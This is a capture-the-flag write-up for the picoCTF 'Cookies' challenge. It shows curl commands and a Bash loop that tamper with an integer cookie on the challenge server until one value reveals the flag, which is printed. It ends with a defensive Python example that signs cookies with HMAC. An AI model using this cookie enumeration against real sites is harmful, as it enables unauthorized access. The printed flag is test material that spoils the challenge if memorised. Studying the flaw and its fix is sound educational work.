Cookies
We are given a website that asks for a cookie:
Looking at the developer tools, we can see that we have a cookie name=-1. If we send snickerdoodle as the placeholder suggests, the cookie will change to name=0.
Let’s modify the value of the cookie using curl and show only the message:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=0' | grep -oE '<b>.*?</b>'
<b>I love snickerdoodle cookies!</b>
Now let’s use a loop in Bash to see whether anything changes when we use other values for the cookie:
$ for i in {0..20}; do echo -n "$i: "; curl mercury.picoctf.net:27177/check -sH "Cookie: name=$i" | grep -oE '<b>.*?</b>'; done
0: <b>I love snickerdoodle cookies!</b>
1: <b>I love chocolate chip cookies!</b>
2: <b>I love oatmeal raisin cookies!</b>
3: <b>I love gingersnap cookies!</b>
4: <b>I love shortbread cookies!</b>
5: <b>I love peanut butter cookies!</b>
6: <b>I love whoopie pie cookies!</b>
7: <b>I love sugar cookies!</b>
8: <b>I love molasses cookies!</b>
9: <b>I love kiss cookies!</b>
10: <b>I love biscotti cookies!</b>
11: <b>I love butter cookies!</b>
12: <b>I love spritz cookies!</b>
13: <b>I love snowball cookies!</b>
14: <b>I love drop cookies!</b>
15: <b>I love thumbprint cookies!</b>
16: <b>I love pinwheel cookies!</b>
17: <b>I love wafer cookies!</b>
18: <b>Flag</b>
19: <b>I love macaroon cookies!</b>
20: <b>I love fortune cookies!</b>
Nice, we see that name=18 will show the flag:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=18' | grep -oE 'picoCTF{.*?}'
picoCTF{3v3ry1_l0v3s_c00k135_064663be}
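The root cause is that the server trusts an integer the client can edit. The following is an added example, not code from this write-up or from the challenge: the server-side logic is not shown on the page, so lookup_unsigned is an assumed model of it, and MESSAGES, INDEX_BY_NAME, issue_cookie and lookup_signed are hypothetical names. It shows the unsigned lookup next to a variant that binds the index to a server-side HMAC so an edited value is rejected.

```python
import hashlib
import hmac
import secrets

# Constructed sample data: three of the messages seen in the loop output above.
MESSAGES = {
    0: "I love snickerdoodle cookies!",
    1: "I love chocolate chip cookies!",
    18: "Flag",
}
# What the search form can legitimately select (assumption: 18 is not among them).
INDEX_BY_NAME = {"snickerdoodle": 0, "chocolate chip": 1}

SECRET_KEY = secrets.token_bytes(32)  # stays on the server, never sent to the client


def lookup_unsigned(cookie_value):
    """Assumed model of the challenge: use the cookie's integer as-is."""
    return MESSAGES.get(int(cookie_value), "not found")


def _tag(index):
    """Hex HMAC-SHA256 of the index string under the server key."""
    return hmac.new(SECRET_KEY, index.encode(), hashlib.sha256).hexdigest()


def issue_cookie(search):
    """Cookie set by the server after a valid search: '<index>.<tag>'."""
    index = str(INDEX_BY_NAME[search])
    return f"{index}.{_tag(index)}"


def lookup_signed(cookie_value):
    """Serve a message only if the index carries a tag issued by the server."""
    index, sep, tag = cookie_value.partition(".")
    if not sep or not hmac.compare_digest(tag.encode(), _tag(index).encode()):
        return "invalid cookie"
    return MESSAGES.get(int(index), "not found")


if __name__ == "__main__":
    cookie = issue_cookie("snickerdoodle")
    print(lookup_unsigned("18"))                         # edited value is accepted
    print(lookup_signed(cookie))                         # server-issued value works
    print(lookup_signed("18." + cookie.split(".")[1]))   # edited index is rejected
```

Signing only proves the server issued the value; anything sensitive should additionally be gated by a server-side authorization check rather than by which index the client presents.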